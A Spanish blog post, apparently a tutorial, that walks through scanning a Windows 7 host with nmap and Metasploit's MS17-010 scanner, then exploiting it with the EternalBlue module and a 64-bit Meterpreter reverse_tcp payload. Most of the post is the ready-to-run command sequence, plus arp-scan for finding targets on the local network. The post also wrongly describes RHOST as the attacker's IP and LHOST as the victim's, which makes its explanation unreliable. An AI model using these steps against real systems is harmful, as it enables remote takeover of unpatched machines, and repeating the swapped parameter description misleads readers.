Header Ads

Header ADS

USANDO UN EXPLOIT PARA WINDOWS 7 EN KALI LINUX 2017.2

Hace un par de meses este exploit a sido publico en el cual he escrito sobre ese tema pero ahora que kali linux a actualizado su base de dato de exploit y a confirmado meter ese exploit en msfconsole.

Antes de empezar quisiera que leas sobre el articulo anterior. Aquí.
Antes no quería hacer publico esto porque aun no entendía quien era el creador real porque siempre había personas modificando el código y compartiéndolo. Entonces hoy te lo voy a mostrar en la base de datos de KALI LINUX.
Creo que si este exploit hubiera aparecido antes me hubiera sido útil para mi examen de OFFSEC.
Te daré un ejemplo tenemos un servidor web con ningún directorio o supuestamente ninguna vulnerabilidad.
Analizamos el servidor con NMAP y me sorprendo que es un windows 7 entonces busque el exploit que es básico para ese servidor y lo hice un escaneo.
nmap -sV -sC 192.168.1.X
Metasploit
msfconsole -q
use auxiliary/scanner/smb/smb_ms17_010
show options
Comprobamos sobre meter el contenido ejemplo un RHOSTS.
set RHOSTS 192.168.1.x
run


Ahora esté es el problema al hacer todo eso menos nmap, lo que harás es que el servidor te bloque ni hacer otro nmap. Entonces vamos a reiniciar la red.
/etc/init.d/network-manager restart
Como ya tenia información que era vulnerable entonces decidí explotarlo.
msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.x
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.3
exploit
Ha ver para explicarte de donde conseguí todo ese comando, tiene que usar
search smb
Encontrarás el exploit o sino
search eternalblue
Luego indicamos que RHOST es la IP de mi maquina y usamos un payload con la arquitectura de 64bits y LHOST es la IP de la víctima en la misma red para sacarla usa
arp-scan -l
Y lo ejecutamos.


 Ahora pregunta  ¿Para 32bits? Bueno si te gusto puede ser que me anime en compartirlo.
No te olvides en compartirlo y darle mucho amor. GRACIAS

No hay comentarios.

Con tecnología de Blogger.